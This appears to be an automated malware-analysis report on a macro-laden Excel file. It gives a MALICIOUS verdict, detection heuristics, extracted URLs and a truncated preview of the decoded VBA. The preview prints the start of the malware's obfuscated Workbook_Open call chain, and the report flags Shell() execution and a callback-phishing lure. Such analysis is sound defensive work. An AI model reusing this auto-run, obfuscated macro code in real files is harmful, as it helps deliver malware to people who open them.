Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, commonly used to download and run additional malicious payloads. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature. The macro's obfuscated nature and the presence of the Shell() call strongly suggest a downloader or dropper functionality.
Heuristics (7)
- ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Callback phishing phone lure (medium, SE_CALLBACK_LURE): Document asks the user to call a phone number in a billing, refund, subscription, fraud, or security context, consistent with callback phishing or tech-support scam patterns. Suppressed for legitimate-issuer (IRS/gov/official-form) documents that carry no urgency or charge/dispute escalation.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.edefter.gov.tr (in document text, OLE body)
  - http://www.xbrl.org/int/gl/bus/2006-10-25 (in document text, OLE body)
  - http://www.xbrl.org/int/gl/cor/2006-10-25 (in document text, OLE body)
  - http://www.xbrl.org/int/gl/muc/2006-10-25 (in document text, OLE body)
  - http://www.xbrl.org/int/gl/plt/2006-10-25 (in document text, OLE body)
  - http://www.xbrl.org/2003/iso4217 (in document text, OLE body)
  - http://www.xbrl.org/2005/iso639 (in document text, OLE body)
  - http://www.xbrl.org/2003/linkbase (in document text, OLE body)
  - http://www.xbrl.org/2003/instance (in document text, OLE body)
  - http://www.gib.gov.tr (in document text, OLE body)
  - http://www.ortadogusondaj.com (in document text, OLE body)
  - http://www.w3.org/2000/09/xmldsig# (in document text, OLE body)
  - http://uri.etsi.org/01903/v1.3.2# (in document text, OLE body)
  - http://www.w3.org/2001/XMLSchema-instance (in document text, OLE body)
  - http://www.w3.org/1999/xlink (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 111652 bytes | 58be2706cd19ffe711673aface151069d2919e8615bc27fcd67150a93fe2f4bc |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Worksheet"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheets"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Fu
... (truncated)